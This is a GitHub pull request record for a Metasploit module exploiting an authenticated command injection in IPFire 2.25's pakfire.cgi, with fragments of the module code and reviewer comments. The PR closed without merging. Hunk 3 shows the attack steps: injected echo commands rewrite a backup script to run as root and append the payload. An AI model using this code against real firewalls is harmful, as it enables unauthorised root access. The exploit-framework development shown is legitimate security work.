### PR TITLE
ipfire 2.25 authenticated remote code execution

### PR DESCRIPTION
**Pull request by KaanaryOverFlow**
added ipfire 2.25 exploit

Please ensure you are submitting **from a unique branch** in your [repository](https://github.com/rapid7/metasploit-framework/pull/11086#issuecomment-445506416) to master in Rapid7's.

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] `use exploit/linux/http/ipfire_pakfire_exec`
- [ ] `set rhost ip`
- [ ] `set password ...`
- [ ] `set username admin`
- [ ] `exploit`
- [ ] [How works](https://github.com/MucahitSaratar/ipfire-2-25-auth-rce/blob/main/README.md)

If you are opening a PR for a new module that exploits a **specific** piece of hardware or requires a **complex or hard-to-find** testing environment, we recommend that you send us a demo of your module executing correctly. Seeing your module in action will help us review your PR faster!

poc

Complex Software Examples:
* Expensive proprietary software
* Software with an extensive installation process
* Software that requires exploit testing across multiple significantly different versions
* Software without an English language UI

We will also accept demonstrations of successful module execution even if your module doesn't meet the above conditions. It's not a necessity, but it may help us land your module faster!

Demonstration of successful module execution can take the form of a packet capture (pcap) or a screen recording. You can send pcaps and recordings to [msfdev@metaspolit.com](mailto:msfdev@metaspolit.com). Please include a CVE number in the subject header (if applicable), and a link to your PR in the email body.

### CODE REVIEW

File: modules/exploits/linux/http/ipfire_pakfire_exec.rb [hunk 1]
```diff
@@ -0,0 +1,139 @@
...
+
+  def kullaniciadi
+    datastore['USERNAME']
+  end
+
+  def parola
+    datastore['PASSWORD']
+  end
+
+  def paket_gonder(metot, calistir = 'sleep 10', bekle = 20)
```
Comment (adfoster-r7) [inline modules/exploits/linux/http/ipfire_pakfire_exec.rb:69]: It'd be great to translate these names to english :+1:

File: modules/exploits/linux/http/ipfire_pakfire_exec.rb [hunk 2]
```diff
@@ -0,0 +1,139 @@
...
+        OptString.new('PASSWORD', [ false, 'Password to login with', ''])
+      ], self.class
+    )
+  end
+
+  def vpath
+    '/cgi-bin/pakfire.cgi' # vulnerable path
+  end
+
+  def kullaniciadi
```
Comment (adfoster-r7) [inline modules/exploits/linux/http/ipfire_pakfire_exec.rb:61]: It'd be great to translate these names to english :+1:

File: modules/exploits/linux/http/ipfire_pakfire_exec.rb [hunk 3]
```diff
@@ -0,0 +1,139 @@
...
+    end
+  end
+
+  def exploit
+    paket_gonder('POST', 'echo "#!/usr/bin/python" > /var/ipfire/backup/bin/backup.pl', 1)
+    vprint_status('first attempt done')
+    paket_gonder('POST', "echo \"__import__('os').setuid(0)\" >> /var/ipfire/backup/bin/backup.pl", 1)
+    vprint_status('setuid triger done')
+    paket_gonder('POST', "echo \"#{payload.encoded}\" >> /var/ipfire/backup/bin/backup.pl", 1)
+    vprint_status('payload yerlestiriliyor-')
```
Comment (adfoster-r7) [inline modules/exploits/linux/http/ipfire_pakfire_exec.rb:133]: It'd be great to translate these names to english :+1:

**Comment by bcoles** [comment]
#15238

**Pull request closed without merging**